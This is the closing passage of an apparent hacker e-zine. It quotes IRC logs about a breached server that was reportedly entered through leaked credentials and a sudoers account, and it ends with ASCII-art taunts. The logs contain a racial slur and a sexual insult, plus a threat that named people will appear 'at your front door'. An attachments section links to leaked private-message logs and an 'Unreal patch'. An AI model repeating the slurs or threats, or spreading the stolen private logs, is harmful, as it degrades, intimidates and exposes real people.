█ bongrip PRIVMSG MLT :to do shit to us
|
|
█ bongrip PRIVMSG MLT :so like
|
|
█ bongrip PRIVMSG MLT :dont tcpdump
|
|
█
|
|
█ <mikevirus> anyway, yall suck cock. stop posturing as real old school
|
|
█ hackers. it's getting old. especially people like MLT who go
|
|
█ "I KNOW AC1DB1TCH3Z!!!!" for attn. yall niggas dunno shit.
|
|
█
|
|
█ <@YogSotho> In my experience, russians are 31337
|
|
█
|
|
█ <MLT> he told me he had the box completely locked down and that everything
|
|
█ was secured
|
|
█ <bongrip> lola said he had the box secured
|
|
█
|
|
█ <bongrip> kinda makes ya feel like a user/pass mighta been dropped
|
|
█ <bongrip> by lola
|
|
█ <bongrip> via a btc
|
|
█ <bongrip> or 2
|
|
█ <bongrip> np
|
|
█
|
|
█ <bongrip> MLT: it was passed on credentials
|
|
█ <bongrip> scraped some shit and found it, sxcurity :\
|
|
█ <bongrip> they didnt hack anything
|
|
█ <bongrip> sxcurity gave them his sudoers account
|
|
█ <bongrip> they got mine out of there and the rest is just...
|
|
█ <bongrip> i mean lol
|
|
█ <bongrip> weakest unix bowlers
|
|
█ <bongrip> u know what
|
|
█ <bongrip> im not even gonna change something
|
|
█ <bongrip> im gonna leave it as is with them having access to lolas box
|
|
█ <bongrip> if they can crack that weak ass md5 hash
|
|
█ <bongrip> and oper up on my accnt
|
|
█ <bongrip> ill give it to ya
|
|
█ <sxcurity> bongrip I did what?
|
|
█ <sxcurity> @ bongrip ?
|
|
█
|
|
█ @ret2libc: Well we just had a lengthly convo with green about how you and
|
|
█ some others from 2600 paid him $$$ to try own us. Damn you must
|
|
█ be desperate.
|
|
█
|
|
█ <bongrip> and green
|
|
█ <bongrip> lol
|
|
█ <bongrip> rip
|
|
█ <bongrip> to him
|
|
█ <bongrip> and his entire future
|
|
█
|
|
█ <MLT> r u actually zf0
|
|
█
|
|
█
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
███▓▓▓▒▒▒░░░ 0x09 Attachments ███
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
█░░
|
|
█░
|
|
█░ [+] PM logs
|
|
█ https://mega.nz/#!gSoxFYjB!WSi7Fj2WPbN-MoGVv48qb7cY1AaiCvOtBnQTcWpy2Ac
|
|
█ [+] Unreal patch
|
|
█ https://mega.nz/#!wCIQ2bgY!67spwHp9nd1g6sbUbuWUcxplcrIYtSOzo5lfd9QTuYs
|
|
█
|
|
█ <n0de9> spread my pm's again and aush0k+kms+zeekill+me at your front door
|
|
█
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
█████████░
|
|
██▀▀▀▀▀█▀
|
|
█ ▄█▀█▄ ▄███▄ ▐█ ▐█▌▐████▌ ▄██▄ ▄█▀█▄ ▐████▌
|
|
█ ██ ██ ██ ██ ▐██▐█▌ ██ ████ ██ ██ ██
|
|
█ ██ ██ ██ ▐████▌ ██ ▐██▐█▌ ██ ██
|
|
█ ██ ██ ██ ██ ▐█▌██▌ ██ ▐█████ ██ ██ ██
|
|
█ ▀█▄█▀ ▀███▀ ▐█▌ █▌ ██ ██▌ ██ ▀█▄█▀ ██
|
|
██▄▄▄▄▄█▄
|
|
█████████
|
|
█████████ Please contact us directly through the FSB
|
|
█████████
|
|
█████████
|
|
███▀▀▀▀▐▀
|
|
██ ▄█▀█▄ ████▄ ▄███ ▄███▐████▌██ ▐█ ▐█▌ ▄█▀█▄ ▄███
|
|
█▌▐██ ██ ██▌██▌██ ██ ██ ██ ▐██▐█▌▐██ ██ ██▄▄▄
|
|
█▌▐█▌▄▄▄ ████▀ ███ ███ ██ ██ ▐████▌▐█▌▄▄▄ ▄▄ ██
|
|
█▌▐█▌ ██ ██▌██ ██ ██ ██ ██ ▐█▌██▌▐█▌ ██ ██ ██
|
|
██ ▀█▄██ ██▌▐█▌▀███ ▀███ ██ ██ ▐█▌ █▌ ▀█▄██ ▀███▀
|
|
███▄▄▄▄▄▄
|
|
█████████ The OFFICIAL root
|
|
█████████ Green
|
|
█████████ danK
|
|
█████████
|
|
█████████
|
|
█████████
|
|
█████████ ░░
|
|
█████████ ░░░░
|
|
█████████ ░░░░░░
|
|
█████████ █▄ ░░░░░░░░
|
|
████████████████████▄ ░░░░░░░░
|
|
██████████████████████▄ ░░░░░░░
|
|
██████████████████████▀ ░░░░░░░ @ MLT: We're borrowing
|
|
████████████████████▀ ░░░ ░░░░░░ your verified checkmark to
|
|
█▀ ░░░░░░ ░░░░░░ verify the authenticity of
|
|
░░░░░░░░ ░░░░░░ this zine. ;)
|
|
░░░░░░░░ ░░░░░░
|
|
░░░░░░░░░░░░░
|
|
░░░░░░░░░░
|
|
░░░░░░░
|